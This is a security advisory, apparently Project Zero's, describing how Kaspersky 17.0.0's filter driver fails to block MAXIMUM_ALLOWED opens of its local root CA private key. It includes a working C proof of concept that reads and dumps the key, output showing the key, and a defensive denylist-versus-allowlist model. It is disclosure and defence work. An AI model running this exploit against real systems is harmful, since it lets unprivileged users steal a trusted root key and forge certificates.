Kaspersky 17.0.0 - Local CA root is Incorrectly Protected
Source: Google Security Research   Author: Google   Published: 2017-01-05
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=989
 
When Kaspersky generates a private key for the local root, they store the private key in %ProgramData%. Obviously this file cannot be shared, because it's the private key for a trusted local root certificate and users can use it to create certificates, sign files, create new roots, etc. If I look at the filesystem ACLs, I should have access, and I was about to complain that they've done this incorrectly, but it doesn't work and it took me a while to figure out what they were doing.
 
$ icacls KLSSL_privkey.pem
KLSSL_privkey.pem BUILTIN\Administrators:(I)(F)
                  BUILTIN\Users:(I)(RX) <-- All users should have read access
                  NT AUTHORITY\SYSTEM:(I)(F)
 
Successfully processed 1 files; Failed processing 0 files
$ cat KLSSL_privkey.pem
cat: KLSSL_privkey.pem: Permission denied
 
Single stepping through why this fails, I can see their filter driver will deny access from their PFLT_POST_OPERATION_CALLBACK after checking the Iopb. That sounds difficult to get right, and reverse engineering the filter driver, I can see they're setting Data->IoStatus.Status = STATUS_ACCESS_DENIED if the Iopb->Parameters (like DesiredAccess or whatever) don't match a hardcoded bitmask.
 
But the blacklist is insufficient, they even missed MAXIMUM_ALLOWED (?!!!). This is trivial to exploit, any unprivileged user can now become a CA.
*/
 
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <fcntl.h>
 
int main(int argc, char **argv)
{
    HANDLE File;
    BYTE buf[2048] = {0};
    DWORD count;
 
    /* Open the local CA private key with MAXIMUM_ALLOWED instead of a
     * concrete right such as GENERIC_READ; the filter's hardcoded
     * DesiredAccess bitmask does not cover this value, so the post-operation
     * callback never sets STATUS_ACCESS_DENIED and the file ACL (which
     * grants BUILTIN\Users read access) decides the outcome. */
    File = CreateFile("c:\\ProgramData\\Kaspersky Lab\\AVP17.0.0\\Data\\Cert\\KLSSL_privkey.pem",
            MAXIMUM_ALLOWED,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
    if (File != INVALID_HANDLE_VALUE) {
        /* Read the key (a 2048-bit RSA key in DER form fits in one buffer)
         * and write it raw to stdout so it can be piped into openssl. */
        if (ReadFile(File, buf, sizeof(buf), &count, NULL) == TRUE) {
            setmode(1, O_BINARY);   /* stdout in binary mode: no CRLF translation */
            fwrite(buf, 1, count, stdout);
        }
        CloseHandle(File);
        return 0;
    }
    return 1;
}
 
/*
$ cl test.c
Microsoft (R) C/C++ Optimizing Compiler Version 18.00.31101 for x86
Copyright (C) Microsoft Corporation.  All rights reserved.
 
test.c
Microsoft (R) Incremental Linker Version 12.00.31101.0
Copyright (C) Microsoft Corporation.  All rights reserved.
 
/out:test.exe
test.obj
$ ./test.exe | openssl rsa -inform DER -text -noout
Private-Key: (2048 bit)
modulus:
    00:b4:3f:57:21:e7:c3:45:e9:43:ec:b4:83:b4:81:
    bb:d3:3b:9b:1b:da:07:55:68:e0:b1:75:38:b9:66:
    0d:4c:e4:e7:f3:92:01:fb:33:bf:e6:34:e4:e8:db:
    f1:7c:53:bc:95:2c:2d:08:8d:7c:8c:03:71:cd:07:
*/
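The root cause above is a denylist over the requested access mask: the filter refuses opens whose DesiredAccess contains a hardcoded set of "dangerous" bits, and MAXIMUM_ALLOWED is not one of them. The following is an added example (not code from the advisory or from Kaspersky's driver) that models that check against an allowlist version which maps generic rights the way the kernel does and refuses anything that is not an explicitly harmless metadata right. The access-mask constants carry their Windows SDK values; `denylist_allows`, `allowlist_allows`, `DENY_BITS` and `HARMLESS` are hypothetical names for this illustration.

```c
/* Models the DesiredAccess check described in the advisory. Constant values
 * are copied from the Windows SDK so this compiles without windows.h.
 * DENY_BITS / HARMLESS and both check functions are hypothetical models. */
#include <stdint.h>
#include <stdbool.h>

typedef uint32_t ACCESS_MASK;

#define FILE_READ_DATA        0x00000001u
#define FILE_WRITE_DATA       0x00000002u
#define FILE_APPEND_DATA      0x00000004u
#define FILE_READ_ATTRIBUTES  0x00000080u
#define READ_CONTROL          0x00020000u
#define SYNCHRONIZE           0x00100000u
#define MAXIMUM_ALLOWED       0x02000000u
#define GENERIC_ALL           0x10000000u
#define GENERIC_EXECUTE       0x20000000u
#define GENERIC_WRITE         0x40000000u
#define GENERIC_READ          0x80000000u
#define FILE_GENERIC_READ     0x00120089u
#define FILE_GENERIC_WRITE    0x00120116u
#define FILE_GENERIC_EXECUTE  0x001200A0u
#define FILE_ALL_ACCESS       0x001F01FFu

/* Denylist model: refuse only if a listed "content" bit is requested.
 * MAXIMUM_ALLOWED is not a content bit, so it is waved through. */
static const ACCESS_MASK DENY_BITS = FILE_READ_DATA | FILE_WRITE_DATA |
    FILE_APPEND_DATA | GENERIC_READ | GENERIC_WRITE | GENERIC_ALL;

bool denylist_allows(ACCESS_MASK desired) {
    return (desired & DENY_BITS) == 0;
}

/* Expand GENERIC_* into the concrete file rights they stand for, as the
 * object manager does for file objects before the access check. */
ACCESS_MASK map_generic(ACCESS_MASK m) {
    ACCESS_MASK out = m & ~(GENERIC_READ | GENERIC_WRITE | GENERIC_EXECUTE | GENERIC_ALL);
    if (m & GENERIC_READ)    out |= FILE_GENERIC_READ;
    if (m & GENERIC_WRITE)   out |= FILE_GENERIC_WRITE;
    if (m & GENERIC_EXECUTE) out |= FILE_GENERIC_EXECUTE;
    if (m & GENERIC_ALL)     out |= FILE_ALL_ACCESS;
    return out;
}

/* Allowlist model: only metadata rights may be granted. MAXIMUM_ALLOWED is
 * refused outright because its meaning is only resolved at open time. */
static const ACCESS_MASK HARMLESS = READ_CONTROL | FILE_READ_ATTRIBUTES | SYNCHRONIZE;

bool allowlist_allows(ACCESS_MASK desired) {
    if (desired & MAXIMUM_ALLOWED) return false;
    return (map_generic(desired) & ~HARMLESS) == 0;
}
```

A file-system filter that must protect a secret should rely on the file's own DACL (no read access for BUILTIN\Users) rather than on filtering access masks at all; the allowlist form is the defensive shape if mask filtering is kept.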
 